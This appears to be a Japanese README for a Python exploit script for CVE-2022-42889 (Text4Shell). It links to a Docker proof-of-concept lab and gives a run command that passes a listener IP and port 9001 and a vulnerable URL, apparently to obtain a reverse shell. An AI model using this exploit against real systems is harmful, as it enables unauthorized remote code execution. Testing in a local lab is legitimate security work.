
CVE-2022-42889 用の Python スクリプト
CVE-2022-42889 用 Python スクリプト
ローカルでテストするには、Docker POC に従ってください: https://github.com/karthikuj/cve-2022-42889-text4shell-docker
PHP 版はこちら: https://github.com/ClickCyber/cve-2022-42889
これをローカルで実行して悪用する場合、使用する IP は Docker コンテナの作成時に生成されるゲートウェイです
Docker コンテナ上で bash シェルを取得した後

chmod でスクリプトを実行可能にしてください
./cve-2022-42889.py 172.17.0.1 9001 'http://localhost/text4shell/attack?search='

NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-42889